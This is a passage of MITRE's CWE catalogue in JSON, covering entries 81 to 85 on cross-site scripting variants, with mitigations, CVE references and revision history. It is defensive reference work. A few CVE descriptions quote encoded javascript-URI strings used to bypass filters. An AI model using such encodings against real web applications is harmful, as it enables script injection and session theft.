Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Basic XSS","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script-Related HTML Tags in a Web Page (Basic XSS)","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script-Related HTML Tags in a Web Page (Basic XSS)","attr":{"@_Date":"2010-06-21"}}]}},"81":{"attr":{"@_ID":"81","@_Name":"Improper Neutralization of Script in an Error Message Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page.","Extended_Description":{"xhtml:p":["Error pages may include customized 403 Forbidden or 404 Not Found pages.","When an attacker can trigger an error that contains script syntax within the attacker\'s input, then cross-site scripting attacks may be possible."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"390","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not write user-controlled input to error pages."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0840","Description":"XSS in default error page from Host: header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0840"},{"Reference":"CVE-2002-1053","Description":"XSS in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1053"},{"Reference":"CVE-2002-1700","Description":"XSS in error page from targeted parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1700"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS in error pages"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"198"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS in Error Pages","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Directives in an Error Message Web Page","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script in an Error Message Web Page","attr":{"@_Date":"2010-06-21"}}]}},"82":{"attr":{"@_ID":"82","@_Name":"Improper Neutralization of Script in Attributes of IMG Tags in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute.","Extended_Description":"Attackers can embed XSS exploits into the values for IMG attributes (e.g. SRC) that is streamed and then executed in a victim\'s browser. Note that when the page is loaded into a user\'s browsers, the exploit will automatically execute.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"83","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-3211","Description":"Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211"},{"Reference":"CVE-2002-1649","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1649"},{"Reference":"CVE-2002-1803","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1803"},{"Reference":"CVE-2002-1804","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1804"},{"Reference":"CVE-2002-1805","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1805"},{"Reference":"CVE-2002-1806","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1806"},{"Reference":"CVE-2002-1807","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1807"},{"Reference":"CVE-2002-1808","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1808"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Script in IMG tags"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Script in IMG Tags","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script in Attributes of IMG Tags in a Web Page","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script in Attributes of IMG Tags in a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"83":{"attr":{"@_ID":"83","@_Name":"Improper Neutralization of Script in Attributes in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes \\"javascript:\\" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0520","Description":"Bypass filtering of SCRIPT tags using onload in BODY, href in A, BUTTON, INPUT, and others.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0520"},{"Reference":"CVE-2002-1493","Description":"guestbook XSS in STYLE or IMG SRC attributes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1493"},{"Reference":"CVE-2002-1965","Description":"Javascript in onerror attribute of IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1965"},{"Reference":"CVE-2002-1495","Description":"XSS in web-based email product via onmouseover event.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495"},{"Reference":"CVE-2002-1681","Description":"XSS via script in &lt;P&gt; tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1681"},{"Reference":"CVE-2004-1935","Description":"Onload, onmouseover, and other events in an e-mail attachment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1935"},{"Reference":"CVE-2005-0945","Description":"Onmouseover and onload events in img, link, and mail tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0945"},{"Reference":"CVE-2003-1136","Description":"Javascript in onmouseover attribute in e-mail address or URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS using Script in Attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"243"}},{"attr":{"@_CAPEC_ID":"244"}},{"attr":{"@_CAPEC_ID":"588"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS using Script in Attributes","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script in Attributes in a Web Page","attr":{"@_Date":"2010-04-05"}}]}},"84":{"attr":{"@_ID":"84","@_Name":"Improper Neutralization of Encoded URI Schemes in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Resolve all URIs to absolute or canonical representations before processing."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0563","Description":"Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL (\\"jav&amp;#X41sc&amp;#0010;ript:\\") in an IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0563"},{"Reference":"CVE-2005-2276","Description":"Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. \\"j&amp;#X41vascript\\" in an IMG tag).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2276"},{"Reference":"CVE-2005-0692","Description":"Encoded script within BBcode IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0692"},{"Reference":"CVE-2002-0117","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0117"},{"Reference":"CVE-2002-0118","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0118"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS using Script Via Encoded URI Schemes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS using Script Via Encoded URI Schemes","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Encoded URI Schemes in a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"85":{"attr":{"@_ID":"85","@_Name":"Doubled Character XSS Manipulations","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"675","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Resolve all filtered input to absolute or canonical representations before processing."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a 